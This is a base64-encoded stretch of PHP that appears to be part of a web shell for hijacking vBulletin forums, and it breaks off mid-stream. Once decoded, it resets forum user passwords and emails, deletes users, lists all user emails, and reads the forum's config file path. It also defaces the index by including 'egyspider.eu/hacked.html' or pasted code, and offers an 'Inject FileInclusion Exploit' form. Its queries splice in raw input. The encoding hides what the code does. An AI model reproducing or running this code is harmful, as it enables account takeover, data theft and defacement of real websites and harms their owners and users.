DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokdmJ1c2VyID0gJF9QT1NUWyd2YnVzZXInXTsNCiR2Ym1haWwgPSAkX1BPU1RbJ3ZibWFpbCddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Pw0KJHF1ZXJ5ID0gJ3VwZGF0ZSB1c2VyIHNldCBlbWFpbD0iJyAuICR2Ym1haWwgLiAnIiB3aGVyZSB1c2VybmFtZT0iJyAuICR2YnVzZXIgLiAnIjsnOw0KJHJlID0gbXlzcWxfcXVlcnkoJHF1ZXJ5KTsNCmlmICgkcmUpDQp7DQplY2hvICc8Zm9udCBzaXplPTM+PGZvbnQgY29sb3I9eWVsbG93PlRoZSBFLU1BSUwgb2YgdGhlIHVzZXIgPC9mb250Pjxmb250IGNvbG9yPXJlZD4nIC4gJHZidXNlciAuICc8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93PiB3YXMgY2hhbmdlZCB0byA8L2ZvbnQ+PGZvbnQgY29sb3I9cmVkPicgLiAkdmJtYWlsIC4gJzwvZm9udD48YnI+QmFjayB0byA8YSBocmVmPSI/Ij5TaGVsbDwvYT48L2ZvbnQ+JzsNCn0gZWxzZSB7DQplY2hvICc8Zm9udCBzaXplPTM+PGZvbnQgY29sb3I9cmVkPkZhaWxlZCB0byBjaGFuZ2UgRS1NQUlMPC9mb250PjwvZm9udD4nOw0KfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0icHN3IiAgJiYgaXNzZXQoJF9QT1NUWyd2YnVzZXInXSkgICYmIGlzc2V0KCRfUE9TVFsndmJwYXNzJ10pKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KJHZidXNlciA9ICRfUE9TVFsndmJ1c2VyJ107DQokdmJwYXNzID0gJF9QT1NUWyd2YnBhc3MnXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRxdWVyeSA9ICdzZWxlY3QgKiBmcm9tIHVzZXIgd2hlcmUgdXNlcm5hbWU9IicgLiAkdmJ1c2VyIC4gJyI7JzsNCiRyZXN1bHQgPSBteXNxbF9xdWVyeSgkcXVlcnkpOw0Kd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcmVzdWx0KSkNCnsNCiRzYWx0ID0gJHJvd1snc2FsdCddOw0KJHggPSBtZDUoJHZicGFzcyk7DQokeCA9JHggLiAkc2FsdDsNCiRwYXNzX3NhbHQgPSBtZDUoJHgpOw0KJHF1ZXJ5ID0gJ3VwZGF0ZSB1c2VyIHNldCBwYXNzd29yZD0iJyAuICRwYXNzX3NhbHQgLiAnIiB3aGVyZSB1c2VybmFtZT0iJyAuICR2YnVzZXIgLiAnIjsnOw0KJHJlID0gbXlzcWxfcXVlcnkoJHF1ZXJ5KTsNCmlmICgkcmUpDQp7DQplY2hvICc8Zm9udCBzaXplPTM+PGZvbnQgY29sb3I9eWVsbG93PlRoZSBwYXNzIG9mIHRoZSB1c2VyIDwvZm9udD48Zm9udCBjb2xvcj1yZWQ+JyAuICR2YnVzZXIgLiAnPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz4gd2FzIGNoYW5nZWQgdG8gPC9mb250Pjxmb250IGNvbG9yPXJlZD4nIC4gJHZicGFzcyAuICc8L2ZvbnQ+PGJyPkJhY2sgdG8gPGEgaHJlZj0iPyI+U2hlbGw8L2E+PC9mb250Pic7DQp9IGVsc2Ugew0KZWNobyAnPGZvbnQgc2l6ZT0zPjxmb250IGNvbG9yPXJlZD5GYWlsZWQgdG8gY2hhbmdlIFBhc3NXb3JkPC9mb250PjwvZm9udD4nOw0KfQ0KfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0ibG9naW4iKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Zm9ybSBuYW1lPSJjaGFuZ2VwYXNzIiBhY3Rpb249Ij9hY3Q9cHN3IiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q2hhbmdlIFVzZXIgUGFzc3dvcmQ6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNoYW5nZSIgdmFsdWU9IkNoYW5nZSIgLz48L3RoPg0KPHRyPjx0ZD5Vc2VyIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InZidXNlciIgdmFsdWU9ImFkbWluIiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+UGFzcyA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJ2YnBhc3MiIHZhbHVlPSJlZ3kgc3BpZGVyIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8Pw0KZWNobyc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJob3N0IiB2YWx1ZT0iJyAuICRob3N0IC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlciIgdmFsdWU9IicgLiAkdXNlciAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3MiIHZhbHVlPSInIC4gJHBhc3MgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkYiIgdmFsdWU9IicgLiAkZGIgLiAnIj4nOw0KPz4NCjwvZm9ybT4NCjxociBjb2xvcj0iIzAwRkYwMCIgLz4NCjxmb3JtIG5hbWU9ImNoYW5nZXBhc3MiIGFjdGlvbj0iP2FjdD1tYWlsIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q2hhbmdlIFVzZXIgRS1NQUlMOjo6Ojo8L3RoPjx0aD48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJDaGFuZ2UiIHZhbHVlPSJDaGFuZ2UiIC8+PC90aD4NCjx0cj48dGQ+VXNlciA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJ2YnVzZXIiIHZhbHVlPSJhZG1pbiIgLz48L3RkPjwvdHI+DQo8dHI+PHRkPk1BSUwgOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0idmJtYWlsIiB2YWx1ZT0iZWd5X3NwaWRlckBob3RtYWlsLmNvbSIgLz48L3RkPjwvdHI+DQo8L3RhYmxlPg0KPD8NCmVjaG8nPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iaG9zdCIgdmFsdWU9IicgLiAkaG9zdCAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InVzZXIiIHZhbHVlPSInIC4gJHVzZXIgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXNzIiB2YWx1ZT0iJyAuICRwYXNzIC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZGIiIHZhbHVlPSInIC4gJGRiIC4gJyI+JzsNCj8+DQo8L2Zvcm0+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Zm9ybSBuYW1lPSJjaGFuZ2VwYXNzIiBhY3Rpb249Ij9hY3Q9ZGVsIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6RGVsZXRlIGEgdXNlcjo6Ojo6PC90aD48dGg+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iQ2hhbmdlIiB2YWx1ZT0iQ2hhbmdlIiAvPjwvdGg+DQo8dHI+PHRkPlVzZXIgOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0idmJ1c2VyIiB2YWx1ZT0iYWRtaW4iIC8+PC90ZD48L3RyPg0KPC90YWJsZT4NCjw/DQplY2hvJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Imhvc3QiIHZhbHVlPSInIC4gJGhvc3QgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJ1c2VyIiB2YWx1ZT0iJyAuICR1c2VyIC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icGFzcyIgdmFsdWU9IicgLiAkcGFzcyAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImRiIiB2YWx1ZT0iJyAuICRkYiAuICciPic7DQo/Pg0KPC9mb3JtPg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPGZvcm0gbmFtZT0iY2hhbmdlcGFzcyIgYWN0aW9uPSI/YWN0PWluYyIgbWV0aG9kPSJwb3N0Ij4NCjx0YWJsZSBib3JkZXI9IjEiIGJnY29sb3I9IiMwMDAwMDAiIGJvcmRlcmNvbG9yPSJsaW1lIg0KYm9yZGVyY29sb3JkYXJrPSJsaW1lIiBib3JkZXJjb2xvcmxpZ2h0PSJsaW1lIj4NCjx0aD46Ojo6OkNoYW5nZSBJbmRleCBieSBJbmNsdXNpb24oTm90IFBMKEVnWSBTcElkRXIpKTo6Ojo6PC90aD48dGg+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iQ2hhbmdlIiB2YWx1ZT0iQ2hhbmdlIiAvPjwvdGg+DQo8dHI+PHRkPkluZGV4IExpbmsgOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0ibGluayIgdmFsdWU9Imh0dHA6Ly93d3cuZWd5c3BpZGVyLmV1L2hhY2tlZC5odG1sIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8Pw0KZWNobyc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJob3N0IiB2YWx1ZT0iJyAuICRob3N0IC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlciIgdmFsdWU9IicgLiAkdXNlciAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3MiIHZhbHVlPSInIC4gJHBhc3MgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkYiIgdmFsdWU9IicgLiAkZGIgLiAnIj4nOw0KPz4NCjwvZm9ybT4NCjxociBjb2xvcj0iIzAwRkYwMCIgLz4NCjxmb3JtIG5hbWU9ImNoYW5nZXBhc3MiIGFjdGlvbj0iP2FjdD1jb2RlIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q2hhbmdlIEluZGV4IGJ5IENvZGUoQWxsIEVkaXRpb24pOjo6Ojo8L3RoPjx0aD48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJDaGFuZ2UiIHZhbHVlPSJDaGFuZ2UiIC8+PC90aD4NCjx0cj48dGQ+SW5kZXggQ29kZSA6IDwvdGQ+PHRkPjx0ZXh0YXJlYSBuYW1lPSJjb2RlIiBjb2xzPTYwIHJvd3M9MjA+PC90ZXh0YXJlYT48L3RkPjwvdHI+DQo8L3RhYmxlPg0KPD8NCmVjaG8nPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iaG9zdCIgdmFsdWU9IicgLiAkaG9zdCAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InVzZXIiIHZhbHVlPSInIC4gJHVzZXIgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXNzIiB2YWx1ZT0iJyAuICRwYXNzIC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZGIiIHZhbHVlPSInIC4gJGRiIC4gJyI+JzsNCj8+DQo8L2Zvcm0+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Zm9ybSBuYW1lPSJjaGFuZ2VwYXNzIiBhY3Rpb249Ij9hY3Q9c2hlbGwiIG1ldGhvZD0icG9zdCI+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+DQo8dGg+Ojo6OjpJbmplY3QgRmlsZUluY2x1c2lvbiBFeHBsb2l0KE5PVCBQTChBTC1NQVNTWUEpKTo6Ojo6PC90aD48dGg+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iQ2hhbmdlIiB2YWx1ZT0iQ2hhbmdlIiAvPjwvdGg+DQo8dHI+PHRkPlZhcmlhYmxlIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InZhciIgdmFsdWU9InNoZWxsIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8Pw0KZWNobyc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJob3N0IiB2YWx1ZT0iJyAuICRob3N0IC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlciIgdmFsdWU9IicgLiAkdXNlciAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3MiIHZhbHVlPSInIC4gJHBhc3MgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkYiIgdmFsdWU9IicgLiAkZGIgLiAnIj4nOw0KPz4NCjwvZm9ybT4NCjw/DQp9DQppZiAoJGFjdCA9PSAnJyl7DQo/Pg0KPGZvcm0gbmFtZT0ibXlmb3JtIiBhY3Rpb249Ij9hY3Q9bG9naW4iIG1ldGhvZD0icG9zdCI+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+DQo8dGg+Ojo6OjpEQVRBQkFTRSBDT05GSUc6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNvbm5lY3QiIHZhbHVlPSJDb25uZWN0IiAvPjwvdGg+PHRyPjx0ZD5Ib3N0IDogPC90ZD48dGQ+PGlucHV0IG5hbWU9Imhvc3QiIHZhbHVlPSJsb2NhbGhvc3QiIC8+PC90ZD48L3RyPg0KPHRyPjx0ZD5Vc2VyIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InVzZXIiIHZhbHVlPSJyb290IiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+UGFzcyA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJwYXNzIiB2YWx1ZT0iIiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+TmFtZSA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJkYiIgdmFsdWU9InZiIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8L2Zvcm0+DQoNCjw/DQp9DQppZiAoJGFjdCA9PSAnbHN0JyAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ2RiJ10pKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Pw0KJHJlID0gbXlzcWxfcXVlcnkoJ3NlbGVjdCAqIGZyb20gdXNlcicpOw0KZWNobyc8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+PHRoPklEPC90aD48dGg+VVNFUk5BTUU8L3RoPjx0aD5FTUFJTDwvdGg+JzsNCndoaWxlICgkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlKSkNCnsNCmVjaG8nPHRyPjx0ZD4nIC4gJHJvd1sndXNlcmlkJ10gLiAnPC90ZD48dGQ+JyAuICRyb3dbJ3VzZXJuYW1lJ10gLiAnPC90ZD48dGQ+JyAuICRyb3dbJ2VtYWlsJ10gLiAnPC90ZD48L3RyPic7DQp9DQplY2hvJzwvdGFibGU+JzsNCj8+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+PHRoPjw/DQokY291bnQgPSBteXNxbF9udW1fcm93cygkcmUpOw0KZWNobyAnTnVtYmVyIG9mIHVzZXJzIHJlZ2lzdGVyZWQgaXMgOiBbICcgLiAkY291bnQgLiAnIF0nOw0KID8+PC90aD48L3RhYmxlPg0KPD8NCn0NCmlmICgkYWN0ID09ICd1c2Vycycpew0KPz4NCiA8Zm9ybSBuYW1lPSJteWZvcm0iIGFjdGlvbj0iP2FjdD1sc3QiIG1ldGhvZD0icG9zdCI+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+DQo8dGg+Ojo6OjpEQVRBQkFTRSBDT05GSUc6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNvbm5lY3QiIHZhbHVlPSJDb25uZWN0IiAvPjwvdGg+PHRyPjx0ZD5Ib3N0IDogPC90ZD48dGQ+PGlucHV0IG5hbWU9Imhvc3QiIHZhbHVlPSJsb2NhbGhvc3QiIC8+PC90ZD48L3RyPg0KPHRyPjx0ZD5Vc2VyIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InVzZXIiIHZhbHVlPSJyb290IiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+UGFzcyA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJwYXNzIiB2YWx1ZT0iIiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+TmFtZSA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJkYiIgdmFsdWU9InZiIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8L2Zvcm0+DQo8Pw0KfQ0KaWYgKCRhY3Q9PSdjb25maWcnKQ0Kew0KPz4NCjxmb3JtIG5hbWU9Im15Zm9ybSIgYWN0aW9uPSI/YWN0PXJlY29uZmlnIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q09ORklHIFBBVEg6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNvbm5lY3QiIHZhbHVlPSJSZWFkIiAvPjwvdGg+DQo8dHI+PHRkPlBBVEggOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0icGF0aCIgdmFsdWU9Ii9ob21lL2hhY2tlZC9wdWJsaWNfaHRtbC92Yi9pbmNsdWRlcy9jb25maWcucGhwIiAvPjwvdGQ+PC90cj48L3RhYmxlPjwvZm9ybT4NCjw/DQp9DQppZiAoJGFjdD09J2luZGV4JykNCnsNCi8vIEluZGV4IEVkaXRvcjxIVE1MIEVkaXRvcj4NCj8+DQo8c2NyaXB0IGxhbmd1YWdlPSdqYXZhc2NyaXB0Jz4NCmZ1bmN0aW9uIGxpbmsoKXsNCnZhciBYID0gcHJvbXB0KCJFbnRlclRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCnZhciB5ID0gcHJvbXB0KCJFbnRlcmxpbmsiLCIiKQ0KaWYgKHk9PSIiIHwgeT09bnVsbCApIHsNCnJldHVybjsNCn0NCg0KaW5kZXhmb3JtLmluZGV4LnZhbHVlPWluZGV4Zm9ybS5pbmRleC52YWx1ZSArICI8YSBocmVmPSIgKyB5ICsiPiIrWCsiPC9hPiI7DQoNCn0NCg0KZnVuY3Rpb24gcmlnaHQoKXsNCnZhciBYID0gcHJvbXB0KCJFbnRlciBUZXh0IiwiIikNCmlmIChYPT0iIiB8IFg9PW51bGwgKSB7DQpyZXR1cm47DQp9DQppbmRleGZvcm0uaW5kZXgudmFsdWU9aW5kZXhmb3JtLmluZGV4LnZhbHVlICsgIjxwIGFsaWduPSdyaWdodCc+IitYKyI8L3A+IjsNCg0KfQ0KZnVuY3Rpb24gbGVmdCgpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPHAgYWxpZ249J2xlZnQnPiIrWCsiPC9wPiI7DQoNCn0NCmZ1bmN0aW9uIGNlbnRlcigpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPGNlbnRlcj4iK1grIjwvY2VudGVyPiI7DQoNCn0NCmZ1bmN0aW9uIGNvbG91cigpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyVGV4dCIsIiIpDQppZiAoWD09IiIgfCBYPT1udWxsICkgew0KcmV0dXJuOw0KfQ0KdmFyIHkgPSBwcm9tcHQoIkVudGVyQ29sb3VyIiwiIikNCmlmICh5PT0iIiB8IHk9PW51bGwgKSB7DQpyZXR1cm47DQp9DQoNCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1